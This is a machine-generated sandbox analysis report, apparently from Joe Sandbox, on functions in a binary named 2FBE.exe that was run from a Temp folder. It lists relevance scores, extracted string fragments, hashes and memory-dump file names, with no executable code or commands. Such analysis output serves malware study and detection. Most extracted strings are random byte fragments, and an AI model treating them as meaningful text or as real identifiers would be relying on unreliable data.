API ID:
String ID: 9sJZ$9sJZ$>(q$>(q$>(q$>(q${bC$|bC$|bC$Ap1$Ap1$h,]$h,]$/$/
API String ID: 0-1954784225
Opcode ID: 93236e171aa9b9fa76f1c19fe02afa14951cf721eac059640852670209ccd1f5
Instruction ID: 76d3075ca3006456c72acea3c24a96c8365e5e671ea5eb1e7addbb03ca3edfa7
Opcode Fuzzy Hash: 93236e171aa9b9fa76f1c19fe02afa14951cf721eac059640852670209ccd1f5
Instruction Fuzzy Hash: F923D336A0C787C6EA74AF16A0D037EE691EB84350FA41137D68D97B94CF2CE4608F65

Function 00007FF7648B8C10 Relevance: 19.4, Strings: 15, Instructions: 662COMMON

Download Yara Rule

Strings

Kc, xrefs: 00007FF7648B9695
y+o, xrefs: 00007FF7648BA138
6AC>, xrefs: 00007FF7648B90E7
@lC(, xrefs: 00007FF7648B8EA1
dSTl, xrefs: 00007FF7648B91D9
eqE, xrefs: 00007FF7648B8D3D
y+o, xrefs: 00007FF7648B8F14
AlC(, xrefs: 00007FF7648B9856
eBal, xrefs: 00007FF7648B934E
eSTl, xrefs: 00007FF7648B91EF
Va, xrefs: 00007FF7648BA263
6AC>, xrefs: 00007FF7648BA216
eBal, xrefs: 00007FF7648B91FA
Vv4-, xrefs: 00007FF7648B8E96
Wv4-, xrefs: 00007FF7648B93D4

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: Kc$6AC>$6AC>$@lC($AlC($Vv4-$Va$Wv4-$dSTl$eBal$eBal$eSTl$eqE$y+o$y+o
API String ID: 0-1434796071
Opcode ID: 08706db2ba4042d8eeb38500a8f06852f9eb17d1b0b20a257fa6f1ffc6ad454f
Instruction ID: e8e3f5b35d8d5b1f44e16c700b240f8fbf4724ddd68ad69cffa66c3cfa02b5ed
Opcode Fuzzy Hash: 08706db2ba4042d8eeb38500a8f06852f9eb17d1b0b20a257fa6f1ffc6ad454f
Instruction Fuzzy Hash: 0D52B736A0C7CBCADA749F1AE4D027EA7A0EB95740FA44537D98DC7B94CE2CD8508B11

Function 00007FF764883AD0 Relevance: 18.5, Strings: 14, Instructions: 993COMMON

Download Yara Rule

Strings

t?^, xrefs: 00007FF7648844F0
]_v, xrefs: 00007FF7648841BD
\f', xrefs: 00007FF764883C40
\f', xrefs: 00007FF76488460F
0s, xrefs: 00007FF7648840D5
]_v, xrefs: 00007FF764883CBE
1Uj, xrefs: 00007FF764883FEA
1Uj, xrefs: 00007FF764884D95
t?^, xrefs: 00007FF764884BCE
0s, xrefs: 00007FF764883D5F
]_v, xrefs: 00007FF7648841D2
0s, xrefs: 00007FF764883D6B
]_v, xrefs: 00007FF764884A32
[f', xrefs: 00007FF764883C28

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: ]_v$]_v$]_v$]_v$[f'$\f'$\f'$t?^$t?^$0s$0s$0s$1Uj$1Uj
API String ID: 0-4198073719
Opcode ID: c78530b5680eed8adb9f8cce8b6f42d42568307f5cb8be227e7c879298c30e64
Instruction ID: 0f5b1b8b7f36a7ed8b306dccec98ba2e5aa6e80308caff2094ee1fb339154d9d
Opcode Fuzzy Hash: c78530b5680eed8adb9f8cce8b6f42d42568307f5cb8be227e7c879298c30e64
Instruction Fuzzy Hash: 91922B72B0D283CEE6789E1A54E067EE290DFD4790FA0013AE65E87FD4DA2DEC504B51

Function 00007FF76488B6A0 Relevance: 17.5, Strings: 13, Instructions: 1290COMMON

Download Yara Rule

Strings

b<i, xrefs: 00007FF76488C2CA
PF&+, xrefs: 00007FF76488C12B
)q, xrefs: 00007FF76488B980
WKn', xrefs: 00007FF76488BA24
?c, xrefs: 00007FF76488BF84
a<i, xrefs: 00007FF76488B911
PF&+, xrefs: 00007FF76488CF5F
b<i, xrefs: 00007FF76488C9C9
XKn', xrefs: 00007FF76488C681
XKn', xrefs: 00007FF76488C115
*q, xrefs: 00007FF76488BF6E
*q, xrefs: 00007FF76488BF06
?c, xrefs: 00007FF76488BF39

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: )q$*q$*q$?c$?c$PF&+$PF&+$WKn'$XKn'$XKn'$a<i$b<i$b<i
API String ID: 0-253853581
Opcode ID: 63045c5d6da34dd7a7737eb795c88a8a81786b50ae78e7f5d83fe896f7367834
Instruction ID: 5014c607aac05ab5ee07640ccf97b9d5c527bc4c4f55a8e2c3c5bcb6c619e6ae
Opcode Fuzzy Hash: 63045c5d6da34dd7a7737eb795c88a8a81786b50ae78e7f5d83fe896f7367834
Instruction Fuzzy Hash: 25C2FB32F196CBCEEB749E2A98C03FD6290FB54794F604936EA0DCB799CE28D5509311

Function 00007FF7648A04D0 Relevance: 17.1, Strings: 13, Instructions: 835COMMON

Download Yara Rule

Strings

QMea, xrefs: 00007FF7648A0D87
kxgK, xrefs: 00007FF7648A0E0A
3u`m, xrefs: 00007FF7648A069B
1we, xrefs: 00007FF7648A06E7
1we, xrefs: 00007FF7648A130E
kxgK, xrefs: 00007FF7648A117C
QMea, xrefs: 00007FF7648A1495
4u`m, xrefs: 00007FF7648A1204
0we, xrefs: 00007FF7648A0582
4u`m, xrefs: 00007FF7648A1209
4u`m, xrefs: 00007FF7648A095A
4u`m, xrefs: 00007FF7648A0DF5
1we, xrefs: 00007FF7648A1313

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: 0we$1we$1we$1we$3u`m$4u`m$4u`m$4u`m$4u`m$QMea$QMea$kxgK$kxgK
API String ID: 0-554904181
Opcode ID: 48a5c10513bfd21b36533462e936af4385beb86961b8c0932769a17666ec91af
Instruction ID: 40f737439a299264b500d7d16400e56f747f3113c909cee737be3ac65772fe10
Opcode Fuzzy Hash: 48a5c10513bfd21b36533462e936af4385beb86961b8c0932769a17666ec91af
Instruction Fuzzy Hash: C9720B23E1D683C5EA749E1A90C037EE6D09B47390FA01932DA4DD7FA5DE6CE4E09711

Function 00007FF76487BAB0 Relevance: 16.1, Strings: 12, Instructions: 1108COMMON

Download Yara Rule

Strings

C\!N, xrefs: 00007FF76487CE8A
Z]N, xrefs: 00007FF76487CC3D
Z]N, xrefs: 00007FF76487C12F
Tm]., xrefs: 00007FF76487C343
Tm]., xrefs: 00007FF76487CADD
vector too long, xrefs: 00007FF76487BAB4
Z, xrefs: 00007FF76487C889
yXF, xrefs: 00007FF76487BBEB
Z, xrefs: 00007FF76487C506
zXF, xrefs: 00007FF76487BC17
C\!N, xrefs: 00007FF76487C22D
zXF, xrefs: 00007FF76487CF0E

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: C\!N$C\!N$Tm].$Tm].$Z]N$Z]N$Z$Z$vector too long$yXF$zXF$zXF
API String ID: 0-2263072351
Opcode ID: 206872c827cbfe06092a8a397020922f12d45322a087cae15547e1b943b2fa45
Instruction ID: 86b942aee38e93c0cc2dd062a0d3467abcf7091ab18eeb7ada11ce83a9c6ad68
Opcode Fuzzy Hash: 206872c827cbfe06092a8a397020922f12d45322a087cae15547e1b943b2fa45
Instruction Fuzzy Hash: 8BA2FC36A0C287C6DB749F1AA4E137EF691FB84344FA04136E95DC77A8CE2CD9909B11

Function 00007FF7648A43B0 Relevance: 16.0, Strings: 12, Instructions: 1036COMMON

Download Yara Rule

Strings

t", xrefs: 00007FF7648A4B7A
p2, xrefs: 00007FF7648A54FA
ISB, xrefs: 00007FF7648A4D38
r2'a, xrefs: 00007FF7648A4593
r2'a, xrefs: 00007FF7648A5774
p2, xrefs: 00007FF7648A47E3
ISB, xrefs: 00007FF7648A546C
t", xrefs: 00007FF7648A4DDB
)m, xrefs: 00007FF7648A44DD
s", xrefs: 00007FF7648A44C0
)m, xrefs: 00007FF7648A4C69
)m, xrefs: 00007FF7648A4D4D

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: r2'a$r2'a$s"$t"$t"$ISB$ISB$p2$p2$)m$)m$)m
API String ID: 0-611830788
Opcode ID: c744fb4b3b0de88feaa83e13d8276a0772e16af085ef348dccac86445c8ddbf8
Instruction ID: 9b009002c319f4d200721ea3b8044b15151f7597748f93ff58afe0f617f460ef
Opcode Fuzzy Hash: c744fb4b3b0de88feaa83e13d8276a0772e16af085ef348dccac86445c8ddbf8
Instruction Fuzzy Hash: 52A2C827A0E782C6DE749F56A4C027EA790EBC4748F644536EA8D87F94CF6CD4D08B11

Function 00007FF764874BF0 Relevance: 13.3, Strings: 10, Instructions: 766COMMON

Download Yara Rule

Strings

N(5, xrefs: 00007FF764875423
Yf F, xrefs: 00007FF764874E3A
|r1, xrefs: 00007FF7648751FD
|r1, xrefs: 00007FF764875775
Yf F, xrefs: 00007FF76487539F
Yf F, xrefs: 00007FF764874C52
N(5, xrefs: 00007FF76487531C
Yf F, xrefs: 00007FF76487585A
Yf F, xrefs: 00007FF764874D2E
Yf F, xrefs: 00007FF764875185

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: N(5$N(5$Yf F$Yf F$Yf F$Yf F$Yf F$Yf F$|r1$|r1
API String ID: 0-2101519453
Opcode ID: f8009be155dd3915636a99641ee24c256478b9ce509bbcfda1072173e71214f3
Instruction ID: 44aca7fbf0734055bc554706081d5bcbc9afbe849a734a0e5fb3b9d365271313
Opcode Fuzzy Hash: f8009be155dd3915636a99641ee24c256478b9ce509bbcfda1072173e71214f3
Instruction Fuzzy Hash: ED621721E08247CBFB68EE7B94E017D6AD1BBC5B54FA04536E90DD7B94C93CE8D04622

Function 00007FF76487D7A0 Relevance: 13.0, Strings: 10, Instructions: 480COMMON

Download Yara Rule

Strings

wsG5, xrefs: 00007FF76487D870
`4H, xrefs: 00007FF76487E01B
<OJ/, xrefs: 00007FF76487D9C9
C:\Users\user\AppData\Local\Temp\2FBE.exe, xrefs: 00007FF76487D7A8
xsG5, xrefs: 00007FF76487D956
=OJ/, xrefs: 00007FF76487DBC6
=OJ/, xrefs: 00007FF76487DB46
`4H, xrefs: 00007FF76487DB66
xsG5, xrefs: 00007FF76487DA8C
=OJ/, xrefs: 00007FF76487D84A

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: <OJ/$=OJ/$=OJ/$=OJ/$C:\Users\user\AppData\Local\Temp\2FBE.exe$wsG5$xsG5$xsG5$`4H$`4H
API String ID: 0-2632201094
Opcode ID: 98e02864a0ecfe842e897b2ba808a186c900f3ea0867794542303abde7885019
Instruction ID: 5fbe43283e60ca5618e0718cc58f834f3b08862314d16640633ee4a6722d9b99
Opcode Fuzzy Hash: 98e02864a0ecfe842e897b2ba808a186c900f3ea0867794542303abde7885019
Instruction Fuzzy Hash: 38123926A0C287CBE6349F2A50E037EE6D1BB85341FA44536EA4DC77D1CE2CE8D18B11

Function 00007FF7648BF370 Relevance: 12.7, Strings: 9, Instructions: 1495COMMON

Download Yara Rule

Strings

Miz , xrefs: 00007FF7648C0F82
-)W, xrefs: 00007FF7648C022E
,)W, xrefs: 00007FF7648BF8E1
iq*, xrefs: 00007FF7648BFD16
Miz , xrefs: 00007FF7648C0374
Liz , xrefs: 00007FF7648BFB3E
iq*, xrefs: 00007FF7648BF833
-)W, xrefs: 00007FF7648C0254
iq*, xrefs: 00007FF7648C0723

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: ,)W$-)W$-)W$Liz $Miz $Miz $iq*$iq*$iq*
API String ID: 0-548768203
Opcode ID: 590b667553db37ad33d46751793886593c5a05ea0047d72605d724c0ba00543e
Instruction ID: ef0928364506c1a12f2043f9dcf3057b542fdaad68aa70b7cd84c36d44c2bcbc
Opcode Fuzzy Hash: 590b667553db37ad33d46751793886593c5a05ea0047d72605d724c0ba00543e
Instruction Fuzzy Hash: 11E2D439A0DB82C6EA74DF1EA0C43BEA391EB95744F601537DA8DC7B98CE2CD4548B11

Function 00007FF7648D5D40 Relevance: 11.9, Strings: 9, Instructions: 654COMMON

Download Yara Rule

Strings

_^|, xrefs: 00007FF7648D61A5
*TZ%, xrefs: 00007FF7648D5E73
7ZX, xrefs: 00007FF7648D612D
_^|, xrefs: 00007FF7648D5FE1
_^|, xrefs: 00007FF7648D63CC
) )~, xrefs: 00007FF7648D63DA
*TZ%, xrefs: 00007FF7648D609D
7ZX, xrefs: 00007FF7648D6358
) )~, xrefs: 00007FF7648D67A5

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: ) )~$) )~$*TZ%$*TZ%$7ZX$7ZX$_^|$_^|$_^|
API String ID: 0-1291360158
Opcode ID: 0c4d4502c6196317015b94aea25025952d428ed83f28c07abe1ef988d46b9726
Instruction ID: 8c16a207923e6490865b005f4ae1bbdb30732936722676ef515137fcbb47b44f
Opcode Fuzzy Hash: 0c4d4502c6196317015b94aea25025952d428ed83f28c07abe1ef988d46b9726
Instruction Fuzzy Hash: 1A42B721B0E687C7EE789E1A94D423EA290EF54751FE0413AE95FC7BD4CE2CE8504B61

Function 00007FF7648E3F20 Relevance: 10.5, Strings: 8, Instructions: 480COMMON

Download Yara Rule

Strings

Qz%a, xrefs: 00007FF7648E4692
S; 9, xrefs: 00007FF7648E428B
-wJ[, xrefs: 00007FF7648E4269
S; 9, xrefs: 00007FF7648E46BA
,wJ[, xrefs: 00007FF7648E4058
-wJ[, xrefs: 00007FF7648E42EC
|O, xrefs: 00007FF7648E44DF
Qz%a, xrefs: 00007FF7648E4304

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: ,wJ[$-wJ[$-wJ[$Qz%a$Qz%a$S; 9$S; 9$|O
API String ID: 0-1154477612
Opcode ID: fe857138256265a509485d277373485d5227e5001fa8a0a2808a081bcbb9ba69
Instruction ID: c8d1e8a8ad2f0a60dbc4b444e31de261c7c66fbfb135571cbc6f5e8f3ee005aa
Opcode Fuzzy Hash: fe857138256265a509485d277373485d5227e5001fa8a0a2808a081bcbb9ba69
Instruction Fuzzy Hash: 80023B6390C243D6EA345D1A90C403EFAA297C0764FAA5131EE4A17BF8CF3CEC654E95

Function 00007FF76486BC00 Relevance: 10.5, Strings: 8, Instructions: 464COMMON

Download Yara Rule

Strings

1NP, xrefs: 00007FF76486C1D5
1NP, xrefs: 00007FF76486BC53
1NP, xrefs: 00007FF76486C0DF
,n, xrefs: 00007FF76486BCBE
,n, xrefs: 00007FF76486C004
l*y, xrefs: 00007FF76486BF29
l*y, xrefs: 00007FF76486C00F
1NP, xrefs: 00007FF76486C277

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: ,n$,n$l*y$l*y$1NP$1NP$1NP$1NP
API String ID: 0-1722865417
Opcode ID: db6509c72773b2e61c1f25060d31486532863ac72bae4357264d848426d9d707
Instruction ID: c9ea6bd1a6d38b04ee4fed4d068c1dc23c088226e5bff4734df7bd5feb6a71c4
Opcode Fuzzy Hash: db6509c72773b2e61c1f25060d31486532863ac72bae4357264d848426d9d707
Instruction Fuzzy Hash: 04125B22F08647D9FFA4AF7A84C017D63A0AF14798F604532EE1DE7794CE2CE9A08351

Function 00007FF7648D4E10 Relevance: 9.5, Strings: 7, Instructions: 799COMMON

Download Yara Rule

Strings

Y@%T, xrefs: 00007FF7648D50AD
HG, xrefs: 00007FF7648D6EDF
Y@%T, xrefs: 00007FF7648D5CAC
9-Y!, xrefs: 00007FF7648D4FA6
X@%T, xrefs: 00007FF7648D4EA6
:-Y!, xrefs: 00007FF7648D5CD5
:-Y!, xrefs: 00007FF7648D543C

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: 9-Y!$:-Y!$:-Y!$HG$X@%T$Y@%T$Y@%T
API String ID: 0-1780662477
Opcode ID: d2613bed107605d1fb09313b4cf4704ddb6acf3d551b46a388c776f1c48611c4
Instruction ID: 08da6d304f1c8659d34b18f3114556ef6be3726058267b75831eabf824a9954e
Opcode Fuzzy Hash: d2613bed107605d1fb09313b4cf4704ddb6acf3d551b46a388c776f1c48611c4
Instruction Fuzzy Hash: 1F721A36A0E743C6EE749F56A5C027EE791EB847A0FA00536EA5EC77E4CE2CD4904B11

Function 00007FF7648A9550 Relevance: 9.4, Strings: 7, Instructions: 652COMMON

Download Yara Rule

Strings

R>t0, xrefs: 00007FF7648A9C0F
R>t0, xrefs: 00007FF7648A9972
h @m, xrefs: 00007FF7648A97EC
B)an, xrefs: 00007FF7648A9EA3
h @m, xrefs: 00007FF7648A9CBE
A)an, xrefs: 00007FF7648A97D2
B)an, xrefs: 00007FF7648A9C3F

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: A)an$B)an$B)an$R>t0$R>t0$h @m$h @m
API String ID: 0-2014293124
Opcode ID: a952c9efa5565efe295c4d81218c6562816acb387cb051f672b544dc10768fb4
Instruction ID: 353ba90b28fc1170cea4f4d63a5c1d839581f698491420f3075d08ac6229dcee
Opcode Fuzzy Hash: a952c9efa5565efe295c4d81218c6562816acb387cb051f672b544dc10768fb4
Instruction Fuzzy Hash: A852F767D0C153C5FA249E26908023AEE90B744B54F55C432DE5B33F98EABEE8D1CB91

Function 00007FF764884E00 Relevance: 8.1, Strings: 6, Instructions: 566COMMON

Download Yara Rule

Strings

/qsZ, xrefs: 00007FF764884F7D
9W1_, xrefs: 00007FF764885150
9W1_, xrefs: 00007FF7648856FB
/qsZ, xrefs: 00007FF7648852EA
9W1_, xrefs: 00007FF764885722
.qsZ, xrefs: 00007FF764884E7D

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: .qsZ$/qsZ$/qsZ$9W1_$9W1_$9W1_
API String ID: 0-2543634031
Opcode ID: 89402d96b922411b10ae2d4b834ca260871eabe2cfc4e2231c842ed1cf945998
Instruction ID: 326cb14290772d842a34ff42c09977452bd5f88d40f5cf112a672f4535077eee
Opcode Fuzzy Hash: 89402d96b922411b10ae2d4b834ca260871eabe2cfc4e2231c842ed1cf945998
Instruction Fuzzy Hash: D422593783C6568AE222DE17A18012BF691B794BB2F565221FEA7137D4DB7CEC018F50

Function 00007FF7648DF5B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 202COMMON

Download Yara Rule

Strings

Y,n, xrefs: 00007FF7648DF7CA
Y,n, xrefs: 00007FF7648DF7A0
X,n, xrefs: 00007FF7648DF6A0

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: X,n$Y,n$Y,n
API String ID: 0-3478138459
Opcode ID: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
Instruction ID: 11ff9cf24a01e3a83582891c32fd706b812df25602de0934ee693bc86e3bd122
Opcode Fuzzy Hash: 7393856a027c7c6f6f46535301fb7d281f3932de209073a71f34fae8c4450ff3
Instruction Fuzzy Hash: 4191B422F15B4AC8FB119F7AD8812EC63B0BB5C798F544621DE4CA3B64DF38D5929310

Function 00007FF7648DDFD0 Relevance: 7.2, Strings: 5, Instructions: 941COMMON

Download Yara Rule

Strings

h, xrefs: 00007FF7648DE049
jjs', xrefs: 00007FF7648DE544
, xrefs: 00007FF7648DED47
ijs', xrefs: 00007FF7648DE14B
jjs', xrefs: 00007FF7648DE868

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: $h$ijs'$jjs'$jjs'
API String ID: 0-1211271916
Opcode ID: 0833125dcb91bdd4cf693f336b6095aefd514b8c7e616e284175bf29d955a52d
Instruction ID: 7d3024979ecd1e918b0ecb990fe7ef99c02d835e6fdd05ea67068e74b798036a
Opcode Fuzzy Hash: 0833125dcb91bdd4cf693f336b6095aefd514b8c7e616e284175bf29d955a52d
Instruction Fuzzy Hash: DD92C636A0DA87C6EE74AF1AA4D03BEE391FB94350F604536D68D83F94DE2DD8508B11

Function 00007FF7648A3150 Relevance: 7.2, Strings: 5, Instructions: 940COMMON

Download Yara Rule

Strings

uc[, xrefs: 00007FF7648A3386
vc[, xrefs: 00007FF7648A38F2
vc[, xrefs: 00007FF7648A3816
5n!, xrefs: 00007FF7648A31C7
5n!, xrefs: 00007FF7648A33A7

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: 5n!$5n!$uc[$vc[$vc[
API String ID: 0-468549941
Opcode ID: d689dfdf6a0b0cb9c1b3688676b1d608ce7ada2b7317cd4df454248670db6ae6
Instruction ID: d26f86eb1ac2d7ba48271477155bb7f2c8962201a05d6a0686d34b710e0581d4
Opcode Fuzzy Hash: d689dfdf6a0b0cb9c1b3688676b1d608ce7ada2b7317cd4df454248670db6ae6
Instruction Fuzzy Hash: 7A820937A0C683C6EA749E1AA4C06BEE390EB85755FA04536E54DC7F94CE6CECD08B11

